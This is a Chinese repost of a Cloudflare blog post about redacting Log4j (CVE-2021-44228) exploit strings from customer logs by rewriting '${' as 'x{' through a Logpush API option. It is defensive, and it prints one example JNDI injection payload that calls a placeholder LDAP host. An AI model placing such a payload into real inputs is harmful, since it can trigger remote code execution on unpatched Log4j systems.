清理Cloudflare日志以保護客戶免受Log4j漏洞影響

來源: cloudflare
作者:Jon Levine & Sohei Okamoto
時間:2022-02-10
13574
2021年12月9日,CVE-2021-44228這種零日漏洞利用在全球曝光。該漏洞會影響Apache Log4j實用工具。Cloudflare 立即更新了我們的WAF,以幫助防御該漏洞,但我們建議客戶盡快更新其系統(tǒng)。

NjU2Mzk4MS5qcGVn.jpg

2021年12月9日,CVE-2021-44228這種零日漏洞利用在全球曝光。該漏洞會影響Apache Log4j實用工具。Cloudflare 立即更新了我們的WAF,以幫助防御該漏洞,但我們建議客戶盡快更新其系統(tǒng)。

然而,我們了解許多Cloudflare客戶通過使用Log4j的軟件使用其日志,因此我們還緩解了通過Cloudflare日志的任何漏洞利用。截至本文發(fā)稿時,我們在發(fā)送給客戶的日志中發(fā)現(xiàn)高達1000次/秒的漏洞利用模式。

客戶可以立即開始更新其Logpush作業(yè),以自動修改可能觸發(fā)此漏洞的令牌。

攻擊的工作方式

您可以閱讀有關(guān)Log4j漏洞工作方式的更多信息。簡而言之,攻擊者可以在任何字符串中添加諸如${jndi:ldap://example.com/a} 之類的內(nèi)容。Log4j會在互聯(lián)網(wǎng)上建立連接以檢索此對象。

Cloudflare日志包含由公共互聯(lián)網(wǎng)上的最終用戶控制的許多字符串字段,例如用戶代理和 URL 路徑。通過此漏洞,惡意用戶有可能在讀取這些字段并使用未修補的Log4j實例的任何系統(tǒng)上進行遠程代碼執(zhí)行。

我們的緩解方案

遺憾的是,僅僅檢查諸如${jndi:ldap之類的令牌不足以防御此漏洞。由于模板中使用強大的語言表達式,還有必要檢查混淆的變體。我們已經(jīng)發(fā)現(xiàn)攻擊者在使用諸如 之類的真實用例變種。因此,修改令牌{ 是防御此漏洞的最常規(guī)方法。

令牌 ${ 在我們目前發(fā)送給客戶的日志中出現(xiàn)的頻率高達1,000次/秒。對一些記錄進行抽查表明,該令牌的許多情況并不是企圖利用此漏洞。因此我們無法安全地修改日志,而不影響可能預期在其日志中出現(xiàn)此令牌的客戶。

從現(xiàn)在開始,客戶可以更新其Logpush作業(yè)以修改所有地方的字符串 ${ 并將其替換為 x{。

為此,客戶可以更新其Logpush作業(yè)選項配置以包括參數(shù)CVE-2021-44228=true。請注意,此選項目前在Cloudflare Dashboard 中不可用,僅可使用API進行修改。

立即登錄,閱讀全文
版權(quán)說明:
本文內(nèi)容來自于cloudflare,本站不擁有所有權(quán),不承擔相關(guān)法律責任。文章內(nèi)容系作者個人觀點,不代表快出海對觀點贊同或支持。如有侵權(quán),請聯(lián)系管理員(zzx@kchuhai.com)刪除!
掃碼登錄
打開掃一掃, 關(guān)注公眾號后即可登錄/注冊
加載中
二維碼已失效 請重試
刷新
賬號登錄/注冊
個人VIP
小程序
快出海小程序
公眾號
快出海公眾號
商務合作
商務合作
投稿采訪
投稿采訪
出海管家
出海管家